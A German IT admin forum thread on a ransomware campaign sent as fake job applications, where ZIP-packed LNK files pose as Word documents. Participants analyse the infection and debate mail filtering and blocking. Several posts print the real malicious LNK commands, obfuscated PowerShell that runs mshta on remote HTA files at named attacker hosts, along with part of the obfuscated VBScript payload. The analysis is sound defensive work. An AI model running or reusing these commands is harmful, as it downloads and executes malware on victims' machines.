36
Neuer Kryptotrojaner mit Dateiendung gZpR1?
Moin Leute,
bin wieder als Feuerwehr gerufen worden, weil jemand eine "Bewerbung" auf eine (tatsächlich) offene Stelle aufgemacht hat und sich damit einen aktuellen Trojaner eingefangen hat.
Scheint aber laut virustotal noch nicht bei allzuvielen (heute morgen ca ein halbes Dutzend) Scannern bekannt zu sein und wenn, dann nur als "Generic Trojan".
Ist zufällig jemand anders hier auch darüber "gestolpert"?
Aktuell läuft eine Neuinstallation Daten aus Backup reinholen. Zum Glück hat es nur einen PC getroffen und er wurde recht zeitig hart ausgeschaltet.
lks
bin wieder als Feuerwehr gerufen worden, weil jemand eine "Bewerbung" auf eine (tatsächlich) offene Stelle aufgemacht hat und sich damit einen aktuellen Trojaner eingefangen hat.
Scheint aber laut virustotal noch nicht bei allzuvielen (heute morgen ca ein halbes Dutzend) Scannern bekannt zu sein und wenn, dann nur als "Generic Trojan".
Ist zufällig jemand anders hier auch darüber "gestolpert"?
Aktuell läuft eine Neuinstallation Daten aus Backup reinholen. Zum Glück hat es nur einen PC getroffen und er wurde recht zeitig hart ausgeschaltet.
lks
Auf Facebook teilen
Auf X (Twitter) teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 479749
Url: https://administrator.de/forum/neuer-kryptotrojaner-mit-dateiendung-gzpr1-479749.html
Ausgedruckt am: 08.04.2025 um 11:04 Uhr
36 Kommentare
Neuester Kommentar
Moin,
es kam also eine Bewerbung.docm die dann aufgeklickt wurde?
Grüße
es kam also eine Bewerbung.docm die dann aufgeklickt wurde?
Grüße
Moin,
https://www.heise.de/security/meldung/Sodinokibi-aka-REvil-der-neue-Shoo ...
https://www.heise.de/security/meldung/Aktuelle-Spam-Mails-verteilen-Rans ...
Das würde auch für mich erklären, warum bisher noch keine Klassifizierung bei Virustotal stattgefunden hat.
Gruß,
Dani
Ist zufällig jemand anders hier auch darüber "gestolpert"?
bisher nocht keine Bekannschaft mit dieser Dateiendung gemacht...., weil jemand eine "Bewerbung" auf eine (tatsächlich) offene Stelle aufgemacht hat und sich damit einen aktuellen Trojaner eingefangen hat.
Kannst du sagen, was im Anhang der E-Mail für Dateien waren?Scheint aber laut virustotal noch nicht bei allzuvielen (heute morgen ca ein halbes Dutzend) Scannern bekannt zu sein und wenn, dann nur als "Generic Trojan".
Könnte dazu der Artikel von Heise von gestern passen?https://www.heise.de/security/meldung/Sodinokibi-aka-REvil-der-neue-Shoo ...
https://www.heise.de/security/meldung/Aktuelle-Spam-Mails-verteilen-Rans ...
Das würde auch für mich erklären, warum bisher noch keine Klassifizierung bei Virustotal stattgefunden hat.
Gruß,
Dani
Jupp. Trotz Schulung und Warnung, etc, weil: "Es sind aktuell Stellen ausgeschrieben und das Anschreiben paßte dazu"
lks
ArbeitszeugnisseX-XLebenslaufX-XDorisXSammer.desc: UTF-8 Unicode text, with very long lines
ArbeitszeugnisseX-XLebenslaufX-XDorisXSammer.zip: Zip archive data, at least v2.0 to extract
Doris Sammer - Arbeitszeugnisse Aktuell.doc.lnk: MS Windows shortcut
Doris Sammer - Lebenslauf Aktuell.doc.lnk: MS Windows shortcut
DorisXSommerX-XBewerbungsfoto.jpg: JPEG image data, JFIF standard 1.01
- jpg und zip waren als Mime-Attachment dran.
- .desc ist der textinhalt der Mail
- die beiden lnk-dateien waren inhalt der zip-datei
Nähere Untersuchungen folgen noch.
lks
nachtrag:
~/Trojaner# strings *lnk
/C:\
windows
System32
WindowsPowerShell
v1.0
powershell.exe
%SystemRoot%\System32\imageres.dll
1SPS
/C:\
windows
System32
WindowsPowerShell
v1.0
powershell.exe
%SystemRoot%\System32\imageres.dll
1SPS
Also per Powershell eingeschleust.
Update 2
https://www.virustotal.com/gui/file/0d37cec747d810c062239564533d8d96f3db ...
Aktuell 21/54 die ihn erkennen.
Moin,
Gruß,
Dani
Also per Powershell eingeschleust.
Was ich noch nicht verstehe, was wurde durch die Powershell aufgerufen? Denn die imageres.dll beinhaltet die Icons, welche man einer Verknüpfung zuweisen kann.Gruß,
Dani
Zitat von @Dani:
Moin,
Moin,
Also per Powershell eingeschleust.
Was ich noch nicht verstehe, was wurde durch die Powershell aufgerufen? Denn die imageres.dll beinhaltet die Icons, welche man einer Verknüpfung zuweisen kann.http://blog.trendmicro.de/trend-angreifer-nutzen-haeufiger-lnk-dateien- ...
Schon bei Locky kam das zur Anwendung.
lks
Zitat von @Lochkartenstanzer:
Update 2
https://www.virustotal.com/gui/file/0d37cec747d810c062239564533d8d96f3db ...
Aktuell 21/54 die ihn erkennen.
Update 2
https://www.virustotal.com/gui/file/0d37cec747d810c062239564533d8d96f3db ...
Aktuell 21/54 die ihn erkennen.
Momentan sind es aus irgendwelchen komischen Gründen nur noch 19/54.
lks
Moin,
der Fall von @lks bestätigt mich wieder darin, trotz anderslautender Kollegenwünsche alle Archivdateien am Mailserver geblockt zu halten und solche Anhänge ohne Quarantäne ins digitale Nirwana "abzulegen"!
Gruß
der Fall von @lks bestätigt mich wieder darin, trotz anderslautender Kollegenwünsche alle Archivdateien am Mailserver geblockt zu halten und solche Anhänge ohne Quarantäne ins digitale Nirwana "abzulegen"!
Gruß
Und ich bin immer noch froh, seit Aufkommen des allerersten Locky bis heute immer noch keine MS-Office-Dateien als Mail-Anhang anzunehmen, derlei Mails werden am Exchange abgewiesen und der Absender kriegt einen NDR, daß er gefälligst ein PDF senden soll.
Wenn wirklich mal ein MS-Office-Dokument per Mail "durch" muß, weil es noch bearbeitet werden muß (z. B. ein Excel-Sheet, in das was einzutragen ist, das ist per PDF so gut wie unmöglich) haben wir ein paar Notfallwege, die nur eingeweihten und von mir persönlich geschulten und sensibilisierten Powerusern zur Verfügung steht. Ansonsten: Fast niemand muß Office-Dateien an uns versenden, PDF passt (fast) immer. Fazit: Die Sperre bleibt. Basta.
Viele Grüße
Wenn wirklich mal ein MS-Office-Dokument per Mail "durch" muß, weil es noch bearbeitet werden muß (z. B. ein Excel-Sheet, in das was einzutragen ist, das ist per PDF so gut wie unmöglich) haben wir ein paar Notfallwege, die nur eingeweihten und von mir persönlich geschulten und sensibilisierten Powerusern zur Verfügung steht. Ansonsten: Fast niemand muß Office-Dateien an uns versenden, PDF passt (fast) immer. Fazit: Die Sperre bleibt. Basta.
Viele Grüße
Zitat von @departure69:
Und ich bin immer noch froh, seit Aufkommen des allerersten Locky bis heute immer noch keine MS-Office-Dateien als Mail-Anhang anzunehmen, derlei Mails werden am Exchange abgewiesen und der Absender kriegt einen NDR, daß er gefälligst ein PDF senden soll.
Und ich bin immer noch froh, seit Aufkommen des allerersten Locky bis heute immer noch keine MS-Office-Dateien als Mail-Anhang anzunehmen, derlei Mails werden am Exchange abgewiesen und der Absender kriegt einen NDR, daß er gefälligst ein PDF senden soll.
Es waren keine Office-Dateien, sondern einen Zip-Datei mit zwei LNK-Dateien, die so taten, als ob sie ein DOC wären und ein JPG mit einem hübschen Frauenbild, vermutlich irgendwo geklaut.
Nach ersten Erkenntnissen startet die LNK-datei ein powershell-skript, daß dann den Payload erst herunterlädt.
lks
Moin,
und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"
P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.
Gruss Penny.
und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"
P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.
Gruss Penny.
Moin,
schwierig auf der Basis die User die User zu trainieren. Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt. Auf der anderen Seite dürfte die imageres dafür sorgen, dass schon ein passendes Icon angezeigt und dann ist der Anwender eh darauf fixiert.
Gepackte Dateien komplett sperren dürfte auch vielen Workflows zuwieder laufen.
Bliebe noch die Variante nur signierte Powershellscripte auszuführen (Hier wärs intressant zu wissen was eigentlich genau ausgeführt wurde), je nach Umgebung, und Anwendung bedeutet das aber erheblichen administrativen Aufwand, den nicht jeder erbringen kann.
Andere Vorschläge?
Grüße
schwierig auf der Basis die User die User zu trainieren. Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt. Auf der anderen Seite dürfte die imageres dafür sorgen, dass schon ein passendes Icon angezeigt und dann ist der Anwender eh darauf fixiert.
Gepackte Dateien komplett sperren dürfte auch vielen Workflows zuwieder laufen.
Bliebe noch die Variante nur signierte Powershellscripte auszuführen (Hier wärs intressant zu wissen was eigentlich genau ausgeführt wurde), je nach Umgebung, und Anwendung bedeutet das aber erheblichen administrativen Aufwand, den nicht jeder erbringen kann.
Andere Vorschläge?
Grüße
@Lochkartenstanzer:
Verstehe.
Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?
Viele Grüße
von
departure69
Verstehe.
Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?
Viele Grüße
von
departure69
Moin
Der Sohn einer Bekannten hat sich jetzt nach Abschluss der Ausbildung auch auf mehrere Stellenanzeigen beworben und wollte alles als Word-Anhänge verschicken, bis ich ihn aufgeklärt habe.
Erst die Aussage, dass Office-Anhänge bei vielen ohne Rückantwort geblockt werden, hat ihn überzeugt, PDF-Dokumente zu erzeugen.
PS: Ganz aktuell habe ich bei einem Kunden 10 Bewerbungen auf eine ausgeschriebene Stelle aus der Quarantäne zustellen lassen. Alle hatten Word-Dokumente angehängt. Anscheinend ist fast niemand in der Lage eine Bewerbung als PDF-Anhang zu versenden.
Zitat von @Penny.Cilin:
und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"
P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.
Womöglich hat sich der/die/das jenige noch als Bürokaufmann beworben. und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"
P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.
Der Sohn einer Bekannten hat sich jetzt nach Abschluss der Ausbildung auch auf mehrere Stellenanzeigen beworben und wollte alles als Word-Anhänge verschicken, bis ich ihn aufgeklärt habe.
Erst die Aussage, dass Office-Anhänge bei vielen ohne Rückantwort geblockt werden, hat ihn überzeugt, PDF-Dokumente zu erzeugen.
PS: Ganz aktuell habe ich bei einem Kunden 10 Bewerbungen auf eine ausgeschriebene Stelle aus der Quarantäne zustellen lassen. Alle hatten Word-Dokumente angehängt. Anscheinend ist fast niemand in der Lage eine Bewerbung als PDF-Anhang zu versenden.
Zitat von @departure69:
@Lochkartenstanzer:
Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?
@Lochkartenstanzer:
Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?
Kann ich jetz tncht nachvollziehen, muß den Mitarbeiter des Kunden mal fragen. Aber ich gehe davon aus, daß er das LNK innerhalb der ZIP angeklickt hat.
Sonst wäre es eine neue "Qualität"
lks
Rohrpost, Buschtrommeln, Rauchzeichen, Turnschuh Admin / -Mitarbeiter, Flurfunk.
Kurz gesagt alles analoge, wie früher.
lks
Gruss Penny.
Kurz gesagt alles analoge, wie früher.
lks
Zitat von @Penny.Cilin:
Rohrpost, Buschtrommeln, Rauchzeichen, Turnschuh Admin / -Mitarbeiter, Flurfunk.
Kurz gesagt alles analoge, wie früher.
Rohrpost, Buschtrommeln, Rauchzeichen, Turnschuh Admin / -Mitarbeiter, Flurfunk.
Kurz gesagt alles analoge, wie früher.
Wobei man da natürlich auch aufpassen muss, wenn da (Puder-)Zucker im Umschlag bei den eingehenden Briefen ist.
Oder der Brief tickt.
lks
Zitat von @goscho:
Moin
Der Sohn einer Bekannten hat sich jetzt nach Abschluss der Ausbildung auch auf mehrere Stellenanzeigen beworben und wollte alles als Word-Anhänge verschicken, bis ich ihn aufgeklärt habe.
Erst die Aussage, dass Office-Anhänge bei vielen ohne Rückantwort geblockt werden, hat ihn überzeugt, PDF-Dokumente zu erzeugen.
PS: Ganz aktuell habe ich bei einem Kunden 10 Bewerbungen auf eine ausgeschriebene Stelle aus der Quarantäne zustellen lassen. Alle hatten Word-Dokumente angehängt. Anscheinend ist fast niemand in der Lage eine Bewerbung als PDF-Anhang zu versenden.
Oder die PDF-Dokumente sind dermaßen groß, daß diese auch schon wieder geblockt werden.Moin
Zitat von @Penny.Cilin:
und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"
P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.
Womöglich hat sich der/die/das jenige noch als Bürokaufmann beworben. und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"
P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.
Der Sohn einer Bekannten hat sich jetzt nach Abschluss der Ausbildung auch auf mehrere Stellenanzeigen beworben und wollte alles als Word-Anhänge verschicken, bis ich ihn aufgeklärt habe.
Erst die Aussage, dass Office-Anhänge bei vielen ohne Rückantwort geblockt werden, hat ihn überzeugt, PDF-Dokumente zu erzeugen.
PS: Ganz aktuell habe ich bei einem Kunden 10 Bewerbungen auf eine ausgeschriebene Stelle aus der Quarantäne zustellen lassen. Alle hatten Word-Dokumente angehängt. Anscheinend ist fast niemand in der Lage eine Bewerbung als PDF-Anhang zu versenden.
ich kenne den Fall, da hat sich jemand beim Arbeitsamt auf eine Stelle beworben und sich beschwert, daß die E-Mailbewerbung wegen der Größe (40 / 50 MB?) abgelehnt wurde. Und das war eine IT-Stelle. Dieser IT'ler (Informatik Trottel) war nicht in der Lage ein PDF mit einer annehmbaren Größe zu erstellen.
Der Sachbearbeiter hat mich dann gefragt, wie groß meine Bewerbungsunterlagen sind. meine Antwort war: Komplette Unterlagen mit allen Zeugnissen, Referenzen, Lebenslauf, Deckblatt und Anschreiben max. 5 MiB. Umfang knapp 80 Seiten.
Und das alles in sehr guter Qualität.
Gruss Penny.
Mein Papier ist irgendwie buggy und ich kann keinen fix dafür herunterladen :/
https://images.earthtouchnews.com/media/1424/2013-09-05-paper-bugs-04.jp ...
Zitat von @Lochkartenstanzer:
Wobei man da natürlich auch aufpassen muss, wenn da (Puder-)Zucker im Umschlag bei den eingehenden Briefen ist.
Oder der Brief tickt.
lks
Zitat von @Penny.Cilin:
Rohrpost, Buschtrommeln, Rauchzeichen, Turnschuh Admin / -Mitarbeiter, Flurfunk.
Kurz gesagt alles analoge, wie früher.
Rohrpost, Buschtrommeln, Rauchzeichen, Turnschuh Admin / -Mitarbeiter, Flurfunk.
Kurz gesagt alles analoge, wie früher.
Wobei man da natürlich auch aufpassen muss, wenn da (Puder-)Zucker im Umschlag bei den eingehenden Briefen ist.
Oder der Brief tickt.
lks
Um einen Post von neulich aufzugreifen hätt ich noch die Idee die Bewerbung auf USB Stick zu schicken. Aber keiner der Dateien enthält sondern sich als Tastatur ausgibt und beim Einstecken ein Word öffnet und die Bewerbung live "tippt". Der einzige Satz lautet dann "Wenn sie das lesen können brauchen Sie wirklich dringend einen IT-Administrator."
Mhhh son Chip kostet nur 9 Euro und die Firmen sind auch noch verpflichtet die Bewerbungsunterlagen zurück zu schicken...
hrhrhrhrgekauft...
@Penny.Cilin
Im Zeitalter des Fachkräftemangel kannst du eine vollständige Blockade von Word-Dateien nicht durchsetzen. Umso größer das Unternehmen um so schwerer wird es. Auf eine Stelle bei uns hatten wir vor kurzem 600 Bewerbungen. Da war alles dabei... doc, docx, PDF, JPG, PNG, etc... Meinst du was in der Personalabteilung los ist, wenn wir technisch verbieten, dass die Dateien bzw. E-Mails abgelehnt werden.
@Bitboy
Wir haben unsere Filter mit dem neuen Muster doc.lnk und Bildformate im Anhang bzw. im Archiv erweitert. Denn sowas verschickt eigentlich kein Geschäftspartner absichtlich.
@goscho
Gruß,
Dani
Im Zeitalter des Fachkräftemangel kannst du eine vollständige Blockade von Word-Dateien nicht durchsetzen. Umso größer das Unternehmen um so schwerer wird es. Auf eine Stelle bei uns hatten wir vor kurzem 600 Bewerbungen. Da war alles dabei... doc, docx, PDF, JPG, PNG, etc... Meinst du was in der Personalabteilung los ist, wenn wir technisch verbieten, dass die Dateien bzw. E-Mails abgelehnt werden.
@Bitboy
Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt.
Das ist genau das Szenario wo ich oben angesprochen habe. MIME-Typ gegen Dateiendung prüfen und wenn diese nicht passt, abweisen.Wir haben unsere Filter mit dem neuen Muster doc.lnk und Bildformate im Anhang bzw. im Archiv erweitert. Denn sowas verschickt eigentlich kein Geschäftspartner absichtlich.
Bliebe noch die Variante nur signierte Powershellscripte auszuführen (Hier wärs intressant zu wissen was eigentlich genau ausgeführt wurde), je nach Umgebung, und Anwendung bedeutet das aber erheblichen administrativen Aufwand, den nicht jeder erbringen kann.
Ich meine mal gelesen zu haben, dass das nicht viel bringt. Denn theoretisch kann vor dem Ausführen die Policy einfach temporär geändert werden. Somit wird jedes Skript wieder ausgeführt. Meiner Meinung nach bringt noch ein kluges Konzept mit Applocker etwas dagegen. Gepackte Dateien komplett sperren dürfte auch vielen Workflows zuwieder laufen.
Braucht man doch nicht. Solange die Applikation nach den definierten Mustern auch darin sucht, sehe ich kein Gefahr.@goscho
Erst die Aussage, dass Office-Anhänge bei vielen ohne Rückantwort geblockt werden, hat ihn überzeugt, PDF-Dokumente zu erzeugen.
Für solche Maßnahmen ohne Rückmeldung gehört dem Admin der Gegenstelle der Hintern versohlt. Das macht man nicht sollte auch nicht Gang und Gebe werden.Gruß,
Dani
Zitat von @Dani:
@Penny.Cilin
Im Zeitalter des Fachkräftemangel kannst du eine vollständige Blockade von Word-Dateien nicht durchsetzen. Umso größer das Unternehmen um so schwerer wird es. Auf eine Stelle bei uns hatten wir vor kurzem 600 Bewerbungen. Da war alles dabei... doc, docx, PDF, JPG, PNG, etc... Meinst du was in der Personalabteilung los ist, wenn wir technisch verbieten, dass die Dateien bzw. E-Mails abgelehnt werden.
@Dani@Penny.Cilin
Im Zeitalter des Fachkräftemangel kannst du eine vollständige Blockade von Word-Dateien nicht durchsetzen. Umso größer das Unternehmen um so schwerer wird es. Auf eine Stelle bei uns hatten wir vor kurzem 600 Bewerbungen. Da war alles dabei... doc, docx, PDF, JPG, PNG, etc... Meinst du was in der Personalabteilung los ist, wenn wir technisch verbieten, dass die Dateien bzw. E-Mails abgelehnt werden.
Doch das geht. Dafür gibt es ein Prozessmanagement. Und wenn es keines gibt, dann gibt es einen Datenschutzbeauftragten. Ich bin derzeit in einem mittelständigem Konzern (60 000 Mitarbeiter), wo ich genau das mit den Prozessmanagern und dem Datenschutzbeauftragten dabei bin dies durchzusetzen. Unser Argument ist: Gefahr durch Verschlüsselungstrojaner.
Und wie schon @Bitboy schreibt und Du darauf antwortest:
@Bitboy
Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt.
Das ist genau das Szenario wo ich oben angesprochen habe. MIME-Typ gegen Dateiendung prüfen und wenn diese nicht passt, abweisen.Wir haben unsere Filter mit dem neuen Muster doc.lnk und Bildformate im Anhang bzw. im Archiv erweitert. Denn sowas verschickt eigentlich kein Geschäftspartner absichtlich.
Gruß,
Dani
P.S. Wenn ein Unternehmen einen Verschlüsselungstrojaner eingefangen hat, dann ist es leichter für die IT zu argumentieren.
Wichtig dabei ist, hartnäckig bleiben. Und ja, es gibt keine 100%ige Sicherheit. Die wird es NIE geben.
Gruss Penny.
@Bitboy
Wir haben unsere Filter mit dem neuen Muster doc.lnk und Bildformate im Anhang bzw. im Archiv erweitert. Denn sowas verschickt eigentlich kein Geschäftspartner absichtlich.
Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt.
Das ist genau das Szenario wo ich oben angesprochen habe. MIME-Typ gegen Dateiendung prüfen und wenn diese nicht passt, abweisen.Wir haben unsere Filter mit dem neuen Muster doc.lnk und Bildformate im Anhang bzw. im Archiv erweitert. Denn sowas verschickt eigentlich kein Geschäftspartner absichtlich.
Was setzt ihr zum Filtern ein?
Bliebe noch die Variante nur signierte Powershellscripte auszuführen (Hier wärs intressant zu wissen was eigentlich genau ausgeführt wurde), je nach Umgebung, und Anwendung bedeutet das aber erheblichen administrativen Aufwand, den nicht jeder erbringen kann.
Ich meine mal gelesen zu haben, dass das nicht viel bringt. Denn theoretisch kann vor dem Ausführen die Policy einfach temporär geändert werden. Somit wird jedes Skript wieder ausgeführt. Meiner Meinung nach bringt noch ein kluges Konzept mit Applocker etwas dagegen.Ohhh... Dann funktioniert das ja ähnlich gut wie die Macro Signatur in Office. Wozu genau hat man das dann eigentlich eingebaut? o0
Zitat von @Lochkartenstanzer:
Kann ich jetzt nicht nachvollziehen, muß den Mitarbeiter des Kunden mal fragen. Aber ich gehe davon aus, daß er das LNK innerhalb der ZIP angeklickt hat.
Zitat von @departure69:
@Lochkartenstanzer:
Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?
@Lochkartenstanzer:
Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?
Kann ich jetzt nicht nachvollziehen, muß den Mitarbeiter des Kunden mal fragen. Aber ich gehe davon aus, daß er das LNK innerhalb der ZIP angeklickt hat.
Der Mitarbeiter hat das ZIP-File ausgepackt und auf die angelblichen "DOC"-Dateien geklickt.
In den lnk-Dateien steht
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "$hk=[string][char[]]@(0x68,0x74,0x74,0x70) -replace ' ','';$hk=$hk+'://178.33.106.120/out-1123954163.hta';mshta $hk%SYSTEMROOT%\System32\WindowsPowerShell\v1.0und als Kommentar noch
dzyOkgSQiAlso hat der Link ganz einfach per Powershell
h-t-t-p-
-/-1-7-8-.-3-3-.-1-0-6-.-1-2-0/-o-u-t---1-1-2-3-9-5-4-1-6-3-.-h-t-a heruntergeladen und ausgeführt.Die Browser blockieren die URL schon. (Die Striche sind dazu da, um die Idioten vor sich selbst zu schützen!).
lks
PS: Die Firma benötigt öfters Leute für einfach Arbeiten und dementsprechend sind die Bewerber oft, ich sag mal so, "einfach gestrickt". Da kommen anscheinend öfters z.B. mit dem Handy fotografierte "Freßzettel", irgendwelche wilden Dokumentenformate und vieles andere mehr als "Bewerbung" an. An der Malware-Mail fiel die korrekte Rechtschreibung und ordentliches Deutsch positiv auf, so daß der Mitarbeiter mal von einer "positiven Ausnahme" bei den Bewerbungen ausging.
Zitat von @Lochkartenstanzer:
Also hat der Link ganz einfach per Powershell
h-t-t-p--/-1-7-8-.-3-3-.-1-0-6-.-1-2-0/-o-u-t---1-1-2-3-9-5-4-1-6-3-.-h-t-a heruntergeladen und ausgeführt.
Ich musste jetzt extra alle Striche entfernen, um den Link aufrufen zu können.Also hat der Link ganz einfach per Powershell
h-t-t-p-
-/-1-7-8-.-3-3-.-1-0-6-.-1-2-0/-o-u-t---1-1-2-3-9-5-4-1-6-3-.-h-t-a heruntergeladen und ausgeführt.Die Browser blockieren die URL schon. (Die Striche sind dazu da, um die Idioten vor sich selbst zu schützen!).
Ups 
PS: Die Firma benötigt öfters Leute für einfach Arbeiten und dementsprechend sind die Bewerber oft, ich sag mal so, "einfach gestrickt". Da kommen anscheinend öfters z.B. mit dem Handy fotografierte "Freßzettel", irgendwelche wilden Dokumentenformate und vieles andere mehr als "Bewerbung" an. An der Malware-Mail fiel die korrekte Rechtschreibung und ordentliches Deutsch positiv auf, so daß der Mitarbeiter mal von einer "positiven Ausnahme" bei den Bewerbungen ausging.
Besser, die Sachen werden herausgefiltert und erst manuell geprüft.
Zitat von @goscho:
Zitat von @Lochkartenstanzer:
Also hat der Link ganz einfach per Powershell
h-t-t-p--/-1-7-8-.-3-3-.-1-0-6-.-1-2-0/-o-u-t---1-1-2-3-9-5-4-1-6-3-.-h-t-a heruntergeladen und ausgeführt.
Ich musste jetzt extra alle Striche entfernen, um den Link aufrufen zu können.Also hat der Link ganz einfach per Powershell
h-t-t-p-
-/-1-7-8-.-3-3-.-1-0-6-.-1-2-0/-o-u-t---1-1-2-3-9-5-4-1-6-3-.-h-t-a heruntergeladen und ausgeführt.Die Browser blockieren die URL schon. (Die Striche sind dazu da, um die Idioten vor sich selbst zu schützen!).
Ups Der
nmap sagt:
Starting Nmap 7.01 ( https://nmap.org ) at 2019-08-01 14:46 CEST
Nmap scan report for ip120.ip-178-33-106.eu (178.33.106.120)
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
3389/tcp open ms-wbt-server
5060/tcp closed sip
5061/tcp closed sip-tls
vermutlich ein gehackter Router oder ein Host, der per RDP ferngewartet wird.
lks
@Lochkartenstanzer
@Penny.Cilin
Die Kunst in der IT ist es doch, die Anwender soweit wie möglich zu beschützen ohne das der Arbeitsablauf umständlich oder zeitraubend wird. Zumal man immer davon aus gehen soll, dass eine Infektion durch eine Malware passiert. Wichtig ist doch, entsprechende Maßnahmenkataloge zu haben damit alle richtig reagieren.
Gruß,
Dani
Der Host Webserver ist übrigens nicht mehr erreichbar. Schade, mich hätte das Script in der HTA-Datei interessiert.
Komisch, sonst reagiert OVH auf Abuse Meldungen eigentlich langsam bis gar nicht. Ich würde an deiner Stell auf dem Proxy/Firewall Dateiendungen HTA sperren. Denn im Regelfall benötigt niemand solch Dateien aus dem Internet.@Penny.Cilin
Doch das geht. Dafür gibt es ein Prozessmanagement. Und wenn es keines gibt, dann gibt es einen Datenschutzbeauftragten. Ich bin derzeit in einem mittelständigem Konzern (60 000 Mitarbeiter), wo ich genau das mit den Prozessmanagern und dem Datenschutzbeauftragten dabei bin dies durchzusetzen. Unser Argument ist: Gefahr durch Verschlüsselungstrojaner.
Die Frage ist dochwie lange der Prozess dauern wird. Wir sind etwas größer als ihr und machen an diesem tiefgreifenden Einschnitt in die bestehende Arbeitsabläufe knapp ein Jahr rum. Zumal spätestens wenn Gewerkschaften und Finanz-/Personal-Controller ins Spiel kommen, z.B. die Arbeitszeit und die IT darf keine Hürden schaffen, unter den TOP10 Argumenten ist. Die IT ist eben nach wie vor nur Mittel zum Zweck, die Kohle kostet.P.S. Wenn ein Unternehmen einen Verschlüsselungstrojaner eingefangen hat, dann ist es leichter für die IT zu argumentieren.
Wichtig dabei ist, hartnäckig bleiben. Und ja, es gibt keine 100%ige Sicherheit. Die wird es NIE geben.Die Kunst in der IT ist es doch, die Anwender soweit wie möglich zu beschützen ohne das der Arbeitsablauf umständlich oder zeitraubend wird. Zumal man immer davon aus gehen soll, dass eine Infektion durch eine Malware passiert. Wichtig ist doch, entsprechende Maßnahmenkataloge zu haben damit alle richtig reagieren.
Gruß,
Dani
Moin,
Update
Heute kam diese "Bewerbung" an eine meiner honeypot-Adressen an. Die Dame heißt anders in Link steht:
Also ist die Malware jetzt auf
h-t-t-p--/-g-a-z-a-s-t-r-i-p-t-e-a-s-e-.-t-o-p-/-o-u-t---2-6-2-6-3-5-0-0-5-.-h-t-a
und der enthaltene hta-Code ist:
Virustotal meldet bei der URL nur zwei (von 71) Treffer als "SPAM"!
bei der zipdatei schlagen 22 von 55 als Trojaner an.
lks
Update
Heute kam diese "Bewerbung" an eine meiner honeypot-Adressen an. Die Dame heißt anders in Link steht:
..\..\..\..\windows\System32\WindowsPowerShell\v1.0\powershell.exe,%SYSTEMROOT%\System32\WindowsPowerShell\v1.0x"$fn=[string][char[]]@(0x68,0x74,0x74,0x70) -replace ' ','';$fn=$fn+'://gazastriptease.top/out-262635005.hta';mshta $fn" Also ist die Malware jetzt auf
h-t-t-p-
-/-g-a-z-a-s-t-r-i-p-t-e-a-s-e-.-t-o-p-/-o-u-t---2-6-2-6-3-5-0-0-5-.-h-t-aund der enthaltene hta-Code ist:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<script language="VBScript">
Public Function ePsNoAmjtS()
ePsNoAmjtS = m_zbbHqyFirstSwitch
End Function
Public Function WekLPwHdDdFxFC(zbbHqy)
Dim LBbaeCl
WekLPwHdDdFxFC = ""
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
WekLPwHdDdFxFC = kuht(zbbHqy)
End If
End If
End Function
Public Function nqqUcB(zbbHqy)
nqqUcB = False
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
nqqUcB = True
End If
End If
End Function
Function JpAoAEKRCC(ArjFeoNni)
ArjFeoNni = Replace(ArjFeoNni, "@", "")
ArjFeoNni = Replace(ArjFeoNni, "*", "")
ArjFeoNni = Replace(ArjFeoNni, "#", "")
JpAoAEKRCC = ArjFeoNni
End Function
Public Function ePsNoAmjtS()
